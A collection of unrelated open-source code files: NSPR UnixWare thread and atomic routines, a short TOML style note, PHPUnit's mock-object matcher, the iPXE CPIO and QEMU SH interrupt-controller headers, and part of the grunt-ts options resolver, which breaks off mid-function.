unflockfile(_uw_semf);
}
void
_MD_ATOMIC_SET(PRInt32 *val, PRInt32 newval)
{
flockfile(_uw_semf);
*val = newval;
unflockfile(_uw_semf);
}
#endif
void
_MD_SET_PRIORITY(_MDThread *thread, PRUintn newPri)
{
return;
}
PRStatus
_MD_InitializeThread(PRThread *thread)
{
return PR_SUCCESS;
}
PRStatus
_MD_WAIT(PRThread *thread, PRIntervalTime ticks)
{
PR_ASSERT(!(thread->flags & _PR_GLOBAL_SCOPE));
_PR_MD_SWITCH_CONTEXT(thread);
return PR_SUCCESS;
}
PRStatus
_MD_WAKEUP_WAITER(PRThread *thread)
{
if (thread) {
PR_ASSERT(!(thread->flags & _PR_GLOBAL_SCOPE));
}
return PR_SUCCESS;
}
/* These functions should not be called for Unixware */
void
_MD_YIELD(void)
{
PR_NOT_REACHED("_MD_YIELD should not be called for Unixware.");
}
PRStatus
_MD_CREATE_THREAD(
PRThread *thread,
void (*start) (void *),
PRThreadPriority priority,
PRThreadScope scope,
PRThreadState state,
PRUint32 stackSize)
{
PR_NOT_REACHED("_MD_CREATE_THREAD should not be called for Unixware.");
}
#else /* USE_SVR4_THREADS */
/* NOTE:
* SPARC v9 (Ultras) do have an atomic test-and-set operation. But
* SPARC v8 doesn't. We should detect in the init if we are running on
* v8 or v9, and then use assembly where we can.
*/
#include <thread.h>
#include <synch.h>
static mutex_t _unixware_atomic = DEFAULTMUTEX;
#define TEST_THEN_ADD(where, inc) \
if (mutex_lock(&_unixware_atomic) != 0)\
PR_ASSERT(0);\
*where += inc;\
if (mutex_unlock(&_unixware_atomic) != 0)\
PR_ASSERT(0);
#define TEST_THEN_SET(where, val) \
if (mutex_lock(&_unixware_atomic) != 0)\
PR_ASSERT(0);\
*where = val;\
if (mutex_unlock(&_unixware_atomic) != 0)\
PR_ASSERT(0);
void
_MD_INIT_ATOMIC(void)
{
}
void
_MD_ATOMIC_INCREMENT(PRInt32 *val)
{
TEST_THEN_ADD(val, 1);
}
void
_MD_ATOMIC_ADD(PRInt32 *ptr, PRInt32 val)
{
TEST_THEN_ADD(ptr, val);
}
void
_MD_ATOMIC_DECREMENT(PRInt32 *val)
{
TEST_THEN_ADD(val, 0xffffffff);
}
void
_MD_ATOMIC_SET(PRInt32 *val, PRInt32 newval)
{
TEST_THEN_SET(val, newval);
}
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/lwp.h>
#include <sys/procfs.h>
#include <sys/syscall.h>
THREAD_KEY_T threadid_key;
THREAD_KEY_T cpuid_key;
THREAD_KEY_T last_thread_key;
static sigset_t set, oldset;
void _MD_EarlyInit(void)
{
THR_KEYCREATE(&threadid_key, NULL);
THR_KEYCREATE(&cpuid_key, NULL);
THR_KEYCREATE(&last_thread_key, NULL);
sigemptyset(&set);
sigaddset(&set, SIGALRM);
}
PRStatus _MD_CREATE_THREAD(PRThread *thread,
void (*start)(void *),
PRThreadPriority priority,
PRThreadScope scope,
PRThreadState state,
PRUint32 stackSize)
{
long flags;
/* mask out SIGALRM for native thread creation */
thr_sigsetmask(SIG_BLOCK, &set, &oldset);
flags = (state == PR_JOINABLE_THREAD ? THR_SUSPENDED/*|THR_NEW_LWP*/
: THR_SUSPENDED|THR_DETACHED/*|THR_NEW_LWP*/);
if (_PR_IS_GCABLE_THREAD(thread) ||
(scope == PR_GLOBAL_BOUND_THREAD))
flags |= THR_BOUND;
if (thr_create(NULL, thread->stack->stackSize,
(void *(*)(void *)) start, (void *) thread,
flags,
&thread->md.handle)) {
thr_sigsetmask(SIG_SETMASK, &oldset, NULL);
return PR_FAILURE;
}
/* When the thread starts running, then the lwpid is set to the right
* value. Until then we want to mark this as 'uninit' so that
* its register state is initialized properly for GC */
thread->md.lwpid = -1;
thr_sigsetmask(SIG_SETMASK, &oldset, NULL);
_MD_NEW_SEM(&thread->md.waiter_sem, 0);
if ((scope == PR_GLOBAL_THREAD) || (scope == PR_GLOBAL_BOUND_THREAD)) {
thread->flags |= _PR_GLOBAL_SCOPE;
}
/*
** Set the thread priority. This will also place the thread on
** the runQ.
**
** Force PR_SetThreadPriority to set the priority by
** setting thread->priority to 100.
*/
{
int pri;
pri = thread->priority;
thread->priority = 100;
PR_SetThreadPriority( thread, pri );
PR_LOG(_pr_thread_lm, PR_LOG_MIN,
("(0X%x)[Start]: on to runq at priority %d",
thread, thread->priority));
}
/* Activate the thread */
if (thr_continue( thread->md.handle ) ) {
return PR_FAILURE;
}
return PR_SUCCESS;
}
void _MD_cleanup_thread(PRThread *thread)
{
thread_t hdl;
PRMonitor *mon;
hdl = thread->md.handle;
/*
** First, suspend the thread (unless it's the active one)
** Because we suspend it first, we don't have to use LOCK_SCHEDULER to
** prevent both of us modifying the thread structure at the same time.
*/
if ( thread != _PR_MD_CURRENT_THREAD() ) {
thr_suspend(hdl);
}
PR_LOG(_pr_thread_lm, PR_LOG_MIN,
("(0X%x)[DestroyThread]\n", thread));
_MD_DESTROY_SEM(&thread->md.waiter_sem);
}
void _MD_SET_PRIORITY(_MDThread *md_thread, PRUintn newPri)
{
if(thr_setprio((thread_t)md_thread->handle, newPri)) {
PR_LOG(_pr_thread_lm, PR_LOG_MIN,
("_PR_SetThreadPriority: can't set thread priority\n"));
}
}
void _MD_WAIT_CV(
struct _MDCVar *md_cv, struct _MDLock *md_lock, PRIntervalTime timeout)
{
struct timespec tt;
PRUint32 msec;
int rv;
PRThread *me = _PR_MD_CURRENT_THREAD();
msec = PR_IntervalToMilliseconds(timeout);
GETTIME (&tt);
tt.tv_sec += msec / PR_MSEC_PER_SEC;
tt.tv_nsec += (msec % PR_MSEC_PER_SEC) * PR_NSEC_PER_MSEC;
/* Check for nsec overflow - otherwise we'll get an EINVAL */
if (tt.tv_nsec >= PR_NSEC_PER_SEC) {
tt.tv_sec++;
tt.tv_nsec -= PR_NSEC_PER_SEC;
}
me->md.sp = unixware_getsp();
/* XXX Solaris 2.5.x gives back EINTR occasionally for no reason
* hence ignore EINTR for now */
COND_TIMEDWAIT(&md_cv->cv, &md_lock->lock, &tt);
}
void _MD_lock(struct _MDLock *md_lock)
{
mutex_lock(&md_lock->lock);
}
void _MD_unlock(struct _MDLock *md_lock)
{
mutex_unlock(&((md_lock)->lock));
}
PRThread *_pr_current_thread_tls()
{
PRThread *ret;
thr_getspecific(threadid_key, (void **)&ret);
return ret;
}
PRStatus
_MD_WAIT(PRThread *thread, PRIntervalTime ticks)
{
_MD_WAIT_SEM(&thread->md.waiter_sem);
return PR_SUCCESS;
}
PRStatus
_MD_WAKEUP_WAITER(PRThread *thread)
{
if (thread == NULL) {
return PR_SUCCESS;
}
_MD_POST_SEM(&thread->md.waiter_sem);
return PR_SUCCESS;
}
_PRCPU *_pr_current_cpu_tls()
{
_PRCPU *ret;
thr_getspecific(cpuid_key, (void **)&ret);
return ret;
}
PRThread *_pr_last_thread_tls()
{
PRThread *ret;
thr_getspecific(last_thread_key, (void **)&ret);
return ret;
}
_MDLock _pr_ioq_lock;
void _MD_INIT_IO (void)
{
_MD_NEW_LOCK(&_pr_ioq_lock);
}
PRStatus _MD_InitializeThread(PRThread *thread)
{
if (!_PR_IS_NATIVE_THREAD(thread))
return;
/* prime the sp; substract 4 so we don't hit the assert that
* curr sp > base_stack
*/
thread->md.sp = (uint_t) thread->stack->allocBase - sizeof(long);
thread->md.lwpid = _lwp_self();
thread->md.handle = THR_SELF();
/* all threads on Solaris are global threads from NSPR's perspective
* since all of them are mapped to Solaris threads.
*/
thread->flags |= _PR_GLOBAL_SCOPE;
/* For primordial/attached thread, we don't create an underlying native thread.
* So, _MD_CREATE_THREAD() does not get called. We need to do initialization
* like allocating thread's synchronization variables and set the underlying
* native thread's priority.
*/
if (thread->flags & (_PR_PRIMORDIAL | _PR_ATTACHED)) {
_MD_NEW_SEM(&thread->md.waiter_sem, 0);
_MD_SET_PRIORITY(&(thread->md), thread->priority);
}
return PR_SUCCESS;
}
static sigset_t old_mask; /* store away original gc thread sigmask */
static int gcprio; /* store away original gc thread priority */
static lwpid_t *all_lwps=NULL; /* list of lwps that we suspended */
static int num_lwps ;
static int suspendAllOn = 0;
#define VALID_SP(sp, bottom, top) \
(((uint_t)(sp)) > ((uint_t)(bottom)) && ((uint_t)(sp)) < ((uint_t)(top)))
void unixware_preempt_off()
{
sigset_t set;
(void)sigfillset(&set);
sigprocmask (SIG_SETMASK, &set, &old_mask);
}
void unixware_preempt_on()
{
sigprocmask (SIG_SETMASK, &old_mask, NULL);
}
void _MD_Begin_SuspendAll()
{
unixware_preempt_off();
PR_LOG(_pr_gc_lm, PR_LOG_ALWAYS, ("Begin_SuspendAll\n"));
/* run at highest prio so I cannot be preempted */
thr_getprio(thr_self(), &gcprio);
thr_setprio(thr_self(), 0x7fffffff);
suspendAllOn = 1;
}
void _MD_End_SuspendAll()
{
}
void _MD_End_ResumeAll()
{
PR_LOG(_pr_gc_lm, PR_LOG_ALWAYS, ("End_ResumeAll\n"));
thr_setprio(thr_self(), gcprio);
unixware_preempt_on();
suspendAllOn = 0;
}
void _MD_Suspend(PRThread *thr)
{
int lwp_fd, result;
int lwp_main_proc_fd = 0;
thr_suspend(thr->md.handle);
if (!_PR_IS_GCABLE_THREAD(thr))
return;
/* XXX Primordial thread can't be bound to an lwp, hence there is no
* way we can assume that we can get the lwp status for primordial
* thread reliably. Hence we skip this for primordial thread, hoping
* that the SP is saved during lock and cond. wait.
* XXX - Again this is concern only for java interpreter, not for the
* server, 'cause primordial thread in the server does not do java work
*/
if (thr->flags & _PR_PRIMORDIAL)
return;
/* if the thread is not started yet then don't do anything */
if (!suspendAllOn || thr->md.lwpid == -1)
return;
}
void _MD_Resume(PRThread *thr)
{
if (!_PR_IS_GCABLE_THREAD(thr) || !suspendAllOn){
/*XXX When the suspendAllOn is set, we will be trying to do lwp_suspend
* during that time we can't call any thread lib or libc calls. Hence
* make sure that no resume is requested for Non gcable thread
* during suspendAllOn */
PR_ASSERT(!suspendAllOn);
thr_continue(thr->md.handle);
return;
}
if (thr->md.lwpid == -1)
return;
if ( _lwp_continue(thr->md.lwpid) < 0) {
PR_ASSERT(0); /* ARGH, we are hosed! */
}
}
PRWord *_MD_HomeGCRegisters(PRThread *t, int isCurrent, int *np)
{
if (isCurrent) {
(void) getcontext(CONTEXT(t)); /* XXX tune me: set md_IRIX.c */
}
*np = NGREG;
if (t->md.lwpid == -1)
memset(&t->md.context.uc_mcontext.gregs[0], 0, NGREG * sizeof(PRWord));
return (PRWord*) &t->md.context.uc_mcontext.gregs[0];
}
int
_pr_unixware_clock_gettime (struct timespec *tp)
{
struct timeval tv;
gettimeofday(&tv, NULL);
tp->tv_sec = tv.tv_sec;
tp->tv_nsec = tv.tv_usec * 1000;
return 0;
}
#endif /* USE_SVR4_THREADS */
| {
"pile_set_name": "Github"
} |
.. _toml-style-guide:
****************
TOML style guide
****************
Keys must be ASCII snake_case.
| {
"pile_set_name": "Github"
} |
<?php
/**
* PHPUnit
*
* Copyright (c) 2010-2012, Sebastian Bergmann <[email protected]>.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* * Neither the name of Sebastian Bergmann nor the names of his
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* @package PHPUnit_MockObject
* @author Sebastian Bergmann <[email protected]>
* @copyright 2010-2012 Sebastian Bergmann <[email protected]>
* @license http://www.opensource.org/licenses/BSD-3-Clause The BSD 3-Clause License
* @link http://github.com/sebastianbergmann/phpunit-mock-objects
* @since File available since Release 1.0.0
*/
/**
* Main matcher which defines a full expectation using method, parameter and
* invocation matchers.
* This matcher encapsulates all the other matchers and allows the builder to
* set the specific matchers when the appropriate methods are called (once(),
* where() etc.).
*
* All properties are public so that they can easily be accessed by the builder.
*
* @package PHPUnit_MockObject
* @author Sebastian Bergmann <[email protected]>
* @copyright 2010-2012 Sebastian Bergmann <[email protected]>
* @license http://www.opensource.org/licenses/BSD-3-Clause The BSD 3-Clause License
* @version Release: @package_version@
* @link http://github.com/sebastianbergmann/phpunit-mock-objects
* @since Class available since Release 1.0.0
*/
class PHPUnit_Framework_MockObject_Matcher implements PHPUnit_Framework_MockObject_Matcher_Invocation
{
/**
* @var PHPUnit_Framework_MockObject_Matcher_Invocation
*/
public $invocationMatcher;
/**
* @var mixed
*/
public $afterMatchBuilderId = NULL;
/**
* @var boolean
*/
public $afterMatchBuilderIsInvoked = FALSE;
/**
* @var PHPUnit_Framework_MockObject_Matcher_MethodName
*/
public $methodNameMatcher = NULL;
/**
* @var PHPUnit_Framework_MockObject_Matcher_Parameters
*/
public $parametersMatcher = NULL;
/**
* @var PHPUnit_Framework_MockObject_Stub
*/
public $stub = NULL;
/**
* @param PHPUnit_Framework_MockObject_Matcher_Invocation $invocationMatcher
*/
public function __construct(PHPUnit_Framework_MockObject_Matcher_Invocation $invocationMatcher)
{
$this->invocationMatcher = $invocationMatcher;
}
/**
* @return string
*/
public function toString()
{
$list = array();
if ($this->invocationMatcher !== NULL) {
$list[] = $this->invocationMatcher->toString();
}
if ($this->methodNameMatcher !== NULL) {
$list[] = 'where ' . $this->methodNameMatcher->toString();
}
if ($this->parametersMatcher !== NULL) {
$list[] = 'and ' . $this->parametersMatcher->toString();
}
if ($this->afterMatchBuilderId !== NULL) {
$list[] = 'after ' . $this->afterMatchBuilderId;
}
if ($this->stub !== NULL) {
$list[] = 'will ' . $this->stub->toString();
}
return join(' ', $list);
}
/**
* @param PHPUnit_Framework_MockObject_Invocation $invocation
* @return mixed
*/
public function invoked(PHPUnit_Framework_MockObject_Invocation $invocation)
{
if ($this->invocationMatcher === NULL) {
throw new PHPUnit_Framework_Exception(
'No invocation matcher is set'
);
}
if ($this->methodNameMatcher === NULL) {
throw new PHPUnit_Framework_Exception('No method matcher is set');
}
if ($this->afterMatchBuilderId !== NULL) {
$builder = $invocation->object
->__phpunit_getInvocationMocker()
->lookupId($this->afterMatchBuilderId);
if (!$builder) {
throw new PHPUnit_Framework_Exception(
sprintf(
'No builder found for match builder identification <%s>',
$this->afterMatchBuilderId
)
);
}
$matcher = $builder->getMatcher();
if ($matcher && $matcher->invocationMatcher->hasBeenInvoked()) {
$this->afterMatchBuilderIsInvoked = TRUE;
}
}
$this->invocationMatcher->invoked($invocation);
try {
if ( $this->parametersMatcher !== NULL &&
!$this->parametersMatcher->matches($invocation)) {
$this->parametersMatcher->verify();
}
}
catch (PHPUnit_Framework_ExpectationFailedException $e) {
throw new PHPUnit_Framework_ExpectationFailedException(
sprintf(
"Expectation failed for %s when %s\n%s",
$this->methodNameMatcher->toString(),
$this->invocationMatcher->toString(),
$e->getMessage()
),
$e->getComparisonFailure()
);
}
if ($this->stub) {
return $this->stub->invoke($invocation);
}
return NULL;
}
/**
* @param PHPUnit_Framework_MockObject_Invocation $invocation
* @return boolean
*/
public function matches(PHPUnit_Framework_MockObject_Invocation $invocation)
{
if ($this->afterMatchBuilderId !== NULL) {
$builder = $invocation->object
->__phpunit_getInvocationMocker()
->lookupId($this->afterMatchBuilderId);
if (!$builder) {
throw new PHPUnit_Framework_Exception(
sprintf(
'No builder found for match builder identification <%s>',
$this->afterMatchBuilderId
)
);
}
$matcher = $builder->getMatcher();
if (!$matcher) {
return FALSE;
}
if (!$matcher->invocationMatcher->hasBeenInvoked()) {
return FALSE;
}
}
if ($this->invocationMatcher === NULL) {
throw new PHPUnit_Framework_Exception(
'No invocation matcher is set'
);
}
if ($this->methodNameMatcher === NULL) {
throw new PHPUnit_Framework_Exception('No method matcher is set');
}
if (!$this->invocationMatcher->matches($invocation)) {
return FALSE;
}
try {
if (!$this->methodNameMatcher->matches($invocation)) {
return FALSE;
}
}
catch (PHPUnit_Framework_ExpectationFailedException $e) {
throw new PHPUnit_Framework_ExpectationFailedException(
sprintf(
"Expectation failed for %s when %s\n%s",
$this->methodNameMatcher->toString(),
$this->invocationMatcher->toString(),
$e->getMessage()
),
$e->getComparisonFailure()
);
}
return TRUE;
}
/**
* @throws PHPUnit_Framework_Exception
* @throws PHPUnit_Framework_ExpectationFailedException
*/
public function verify()
{
if ($this->invocationMatcher === NULL) {
throw new PHPUnit_Framework_Exception(
'No invocation matcher is set'
);
}
if ($this->methodNameMatcher === NULL) {
throw new PHPUnit_Framework_Exception('No method matcher is set');
}
try {
$this->invocationMatcher->verify();
if ($this->parametersMatcher === NULL) {
$this->parametersMatcher = new PHPUnit_Framework_MockObject_Matcher_AnyParameters;
}
$invocationIsAny = get_class($this->invocationMatcher) === 'PHPUnit_Framework_MockObject_Matcher_AnyInvokedCount';
if (!$invocationIsAny) {
$this->parametersMatcher->verify();
}
}
catch (PHPUnit_Framework_ExpectationFailedException $e) {
throw new PHPUnit_Framework_ExpectationFailedException(
sprintf(
"Expectation failed for %s when %s.\n%s",
$this->methodNameMatcher->toString(),
$this->invocationMatcher->toString(),
$e->getMessage()
)
);
}
}
}
| {
"pile_set_name": "Github"
} |
#ifndef _IPXE_CPIO_H
#define _IPXE_CPIO_H
/** @file
*
* CPIO archives
*
*/
FILE_LICENCE ( GPL2_OR_LATER_OR_UBDL );
/** A CPIO archive header
*
* All field are hexadecimal ASCII numbers padded with '0' on the
* left to the full width of the field.
*/
struct cpio_header {
/** The string "070701" or "070702" */
char c_magic[6];
/** File inode number */
char c_ino[8];
/** File mode and permissions */
char c_mode[8];
/** File uid */
char c_uid[8];
/** File gid */
char c_gid[8];
/** Number of links */
char c_nlink[8];
/** Modification time */
char c_mtime[8];
/** Size of data field */
char c_filesize[8];
/** Major part of file device number */
char c_maj[8];
/** Minor part of file device number */
char c_min[8];
/** Major part of device node reference */
char c_rmaj[8];
/** Minor part of device node reference */
char c_rmin[8];
/** Length of filename, including final NUL */
char c_namesize[8];
/** Checksum of data field if c_magic is 070702, othersize zero */
char c_chksum[8];
} __attribute__ (( packed ));
/** CPIO magic */
#define CPIO_MAGIC "070701"
extern void cpio_set_field ( char *field, unsigned long value );
#endif /* _IPXE_CPIO_H */
| {
"pile_set_name": "Github"
} |
#ifndef __SH_INTC_H__
#define __SH_INTC_H__
#include "qemu-common.h"
#include "irq.h"
typedef unsigned char intc_enum;
struct intc_vect {
intc_enum enum_id;
unsigned short vect;
};
#define INTC_VECT(enum_id, vect) { enum_id, vect }
struct intc_group {
intc_enum enum_id;
intc_enum enum_ids[32];
};
#define INTC_GROUP(enum_id, ...) { enum_id, { __VA_ARGS__ } }
struct intc_mask_reg {
unsigned long set_reg, clr_reg, reg_width;
intc_enum enum_ids[32];
unsigned long value;
};
struct intc_prio_reg {
unsigned long set_reg, clr_reg, reg_width, field_width;
intc_enum enum_ids[16];
unsigned long value;
};
#define _INTC_ARRAY(a) a, ARRAY_SIZE(a)
struct intc_source {
unsigned short vect;
intc_enum next_enum_id;
int asserted; /* emulates the interrupt signal line from device to intc */
int enable_count;
int enable_max;
int pending; /* emulates the result of signal and masking */
struct intc_desc *parent;
};
struct intc_desc {
qemu_irq *irqs;
struct intc_source *sources;
int nr_sources;
struct intc_mask_reg *mask_regs;
int nr_mask_regs;
struct intc_prio_reg *prio_regs;
int nr_prio_regs;
int iomemtype;
int pending; /* number of interrupt sources that has pending set */
};
int sh_intc_get_pending_vector(struct intc_desc *desc, int imask);
struct intc_source *sh_intc_source(struct intc_desc *desc, intc_enum id);
void sh_intc_toggle_source(struct intc_source *source,
int enable_adj, int assert_adj);
void sh_intc_register_sources(struct intc_desc *desc,
struct intc_vect *vectors,
int nr_vectors,
struct intc_group *groups,
int nr_groups);
int sh_intc_init(struct intc_desc *desc,
int nr_sources,
struct intc_mask_reg *mask_regs,
int nr_mask_regs,
struct intc_prio_reg *prio_regs,
int nr_prio_regs);
void sh_intc_set_irl(void *opaque, int n, int level);
#endif /* __SH_INTC_H__ */
| {
"pile_set_name": "Github"
} |
/// <reference path="../../defs/tsd.d.ts"/>
/// <reference path="./interfaces.d.ts"/>
'use strict';
import {GruntTSDefaults} from './defaults';
import * as utils from './utils';
import * as _ from 'lodash';
import {Promise} from 'es6-promise';
import {resolveVSOptionsAsync} from './visualStudioOptionsResolver';
import {resolveAsync as resolveTSConfigAsync} from './tsconfig';
// Compiler Options documentation:
// https://github.com/Microsoft/TypeScript-Handbook/blob/master/pages/Compiler%20Options.md
const propertiesFromTarget = ['amdloader', 'baseDir', 'html', 'htmlOutDir', 'htmlOutDirFlatten', 'reference', 'testExecute', 'tsconfig',
'templateCache', 'vs', 'watch'],
// supported via other code: out, outDir, outFile, project
propertiesFromTargetOptions = ['additionalFlags',
'allowJs',
'allowSyntheticDefaultImports',
'allowUnreachableCode',
'allowUnusedLabels',
'alwaysStrict',
'baseUrl',
'charset',
'comments',
'compile',
'compiler',
'declaration',
'declarationDir',
'diagnostics',
'disableSizeLimit',
'emitBOM',
'emitDecoratorMetadata',
'emitGruntEvents',
'experimentalAsyncFunctions',
'experimentalDecorators',
'failOnTypeErrors',
'fast',
/* help purposefully not supported. */
'forceConsistentCasingInFileNames',
'htmlModuleTemplate',
'htmlOutDir',
'htmlOutDirFlatten',
'htmlOutputTemplate',
'htmlVarTemplate',
'importHelpers',
'inlineSourceMap',
'inlineSources',
/* init purposefully not supported. */
'isolatedModules',
'jsx',
'jsxFactory',
'lib',
'listEmittedFiles',
'listFiles',
'locale',
'mapRoot',
'maxNodeModuleJsDepth',
'module',
'moduleResolution',
'newLine',
'noEmit',
'noEmitHelpers',
'noEmitOnError',
'noFallthroughCasesInSwitch',
'noImplicitAny',
'noImplicitReturns',
'noImplicitThis',
'noImplicitUseStrict',
'noLib',
'noResolve',
'noUnusedLocals',
'noUnusedParameters',
/* paths is purposefully not supported - requires use of tsconfig.json */
'preserveConstEnums',
'pretty',
'reactNamespace',
'removeComments',
'rootDir',
/* rootDirs is purposefully not supported - requires use of tsconfig.json */
'skipDefaultLibCheck',
'skipLibCheck',
'sourceMap',
'sourceRoot',
'strictNullChecks',
'stripInternal',
'suppressExcessPropertyErrors',
'suppressImplicitAnyIndexErrors',
'target',
'traceResolution',
'types',
'typeRoots',
/* version is purposefully not supported. */
/* watch is purposefully not supported. */
'verbose'],
delayTemplateExpansion = ['htmlModuleTemplate', 'htmlVarTemplate', 'htmlOutputTemplate'];
let templateProcessor: (templateString: string, options: any) => string = null;
let globExpander: (globs: string[]) => string[] = null;
let verboseLogger: (logText: string) => void = null;
function noopTemplateProcessor(templateString: string, options: any) {
return templateString;
}
function emptyGlobExpander(globs: string[]): string[] {
return [];
}
(<any>emptyGlobExpander).isStub = true;
function emptyVerboseLogger(logText: string) {
// noop.
}
export function resolveAsync(rawTaskOptions: ITargetOptions,
rawTargetOptions: ITargetOptions,
targetName = '',
resolvedFiles: IGruntTSCompilationInfo[] = [],
theTemplateProcessor: typeof templateProcessor = null,
theGlobExpander: typeof globExpander = null,
theVerboseLogger: typeof verboseLogger = null): Promise<IGruntTSOptions> {
let result = emptyOptionsResolveResult();
return new Promise<IGruntTSOptions>((resolve, reject) => {
if (theTemplateProcessor && typeof theTemplateProcessor === 'function') {
templateProcessor = theTemplateProcessor;
} else {
templateProcessor = noopTemplateProcessor;
}
if (theGlobExpander && typeof theGlobExpander === 'function') {
globExpander = theGlobExpander;
} else {
globExpander = emptyGlobExpander;
}
if (theVerboseLogger && typeof theVerboseLogger === 'function') {
verboseLogger = theVerboseLogger;
} else {
verboseLogger = emptyVerboseLogger;
}
fixMissingOptions(rawTaskOptions);
fixMissingOptions(rawTargetOptions);
{
const {errors, warnings} = resolveAndWarnOnConfigurationIssues(rawTaskOptions, rawTargetOptions, targetName);
result.errors.push(...errors);
result.warnings.push(...warnings);
}
result = applyGruntOptions(result, rawTaskOptions);
result = applyGruntOptions(result, rawTargetOptions);
result = copyCompilationTasks(result, resolvedFiles, resolveOutputOptions(rawTaskOptions, rawTargetOptions));
resolveVSOptionsAsync(result, rawTaskOptions, rawTargetOptions, templateProcessor).then((result) => {
resolveTSConfigAsync(result, rawTaskOptions, rawTargetOptions, templateProcessor, globExpander, verboseLogger).then((result) => {
result = addressAssociatedOptionsAndResolveConflicts(result);
result = enclosePathsInQuotesIfRequired(result);
result = logAdditionalConfigurationWarnings(result);
result = applyGruntTSDefaults(result);
if (result.targetName === undefined ||
(!result.targetName && targetName)) {
result.targetName = targetName;
}
return resolve(result);
}).catch((tsConfigError) => {
if (tsConfigError.message) {
result.errors.push('tsconfig error: ' + tsConfigError.message);
} else {
result.errors.push('tsconfig error: ' + JSON.stringify(tsConfigError));
}
return resolve(result);
});
}).catch((vsConfigError) => {
if (vsConfigError.message) {
result.errors.push('Visual Studio config issue: ' + vsConfigError.message);
} else {
result.errors.push('Visual Studio config issue: ' + JSON.stringify(vsConfigError));
}
return resolve(result);
});
});
}
function resolveOutputOptions(rawTaskOptions:
IGruntTargetOptions, rawTargetOptions: IGruntTargetOptions) {
const result: {outDir?: string, out?: string} = {};
const props = ['outDir', 'out'];
const options = [rawTaskOptions, rawTargetOptions];
options.forEach((opt) => {
props.forEach((prop) => {
if (opt && (prop in opt)) {
result[prop] = opt[prop];
}
});
});
return result;
}
function fixMissingOptions(config: ITargetOptions) {
if (config && !config.options) {
config.options = <any>{};
}
}
function emptyOptionsResolveResult() {
return <IGruntTSOptions><any>{
warnings: [],
errors: []
};
}
function logAdditionalConfigurationWarnings(options: IGruntTSOptions) {
return options;
}
function resolveAndWarnOnConfigurationIssues(task: ITargetOptions,
target: ITargetOptions, targetName: string) {
let errors : string[] = [], warnings: string[] = [];
const lowercaseTargetProps = _.map(propertiesFromTarget, (prop) => prop.toLocaleLowerCase());
const lowercaseTargetOptionsProps = _.map(propertiesFromTargetOptions, (prop) => prop.toLocaleLowerCase());
checkFixableCaseIssues(task, 'ts task');
checkFixableCaseIssues(target, `target "${targetName}"`);
checkLocations(task, 'ts task');
checkLocations(target, `target "${targetName}"`);
fixFilesUsedWithFast(task, 'ts task');
fixFilesUsedWithFast(target, `target "${targetName}"`);
warnings.push(...getAdditionalWarnings(task, target, targetName));
return {errors, warnings};
function getAdditionalWarnings(task: any, target: any, targetName: string) {
const additionalWarnings = [];
if (propertiesFromTarget.indexOf(targetName) >= 0) {
additionalWarnings.push(`Warning: Using the grunt-ts keyword "${targetName}" as a target name may cause ` +
`incorrect behavior or errors.`);
}
if (((task && task.src && targetName !== 'src') || (target && target.src)) &&
((task && task.files) || (target && target.files))) {
additionalWarnings.push(`Warning: In task "${targetName}", either "files" or "src" should be used - not both.`);
}
if (((task && task.vs) || (target && target.vs)) &&
((task && task.files) || (target && target.files))) {
additionalWarnings.push(`Warning: In task "${targetName}", either "files" or "vs" should be used - not both.`);
}
if (usingDestArray(task) || usingDestArray(target)) {
additionalWarnings.push(`Warning: target "${targetName}" has an array specified for the files.dest property.` +
` This is not supported. Taking first element and ignoring the rest.`);
}
if ((task && task.outFile) || (target && target.outFile)) {
additionalWarnings.push(`Warning: target "${targetName}" is using "outFile". This is not supported by` +
` grunt-ts via the Gruntfile - it's only relevant when present in tsconfig.json file. Use "out" instead.`);
}
return additionalWarnings;
function usingDestArray(task) {
let result = false;
if (task && task.files && _.isArray(task.files)) {
task.files.forEach(item => {
if (_.isArray(item.dest)) {
result = true;
};
});
}
return result;
}
}
function fixFilesUsedWithFast(task: any, configName: string) {
if (task && task.files && task.options && task.options.fast) {
warnings.push(`Warning: ${configName} is attempting to use fast compilation with "files". ` +
`This is not currently supported. Setting "fast" to "never".`);
task.options.fast = 'never';
}
}
function checkLocations(task: ITargetOptions, configName: string) {
// todo: clean this up. The top and bottom sections are largely the same.
if (task) {
for (let propertyName in task) {
if (propertiesFromTarget.indexOf(propertyName) === -1 && propertyName !== 'options') {
if (propertiesFromTargetOptions.indexOf(propertyName) > -1 &&
!_.isPlainObject(task[propertyName])) {
let warningText = `Property "${propertyName}" in ${configName} is possibly in the wrong place and will be ignored. ` +
`It is expected on the options object.`;
warnings.push(warningText);
} else if (lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase()) === -1 &&
lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase()) > -1 &&
!_.isPlainObject(task[propertyName])) {
let index = lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase());
let correctPropertyName = propertiesFromTargetOptions[index];
let warningText = `Property "${propertyName}" in ${configName} is possibly in the wrong place and will be ignored. ` +
`It is expected on the options object. It is also the wrong case and should be ${correctPropertyName}.`;
warnings.push(warningText);
}
}
}
if (task.options) {
for (let propertyName in task.options) {
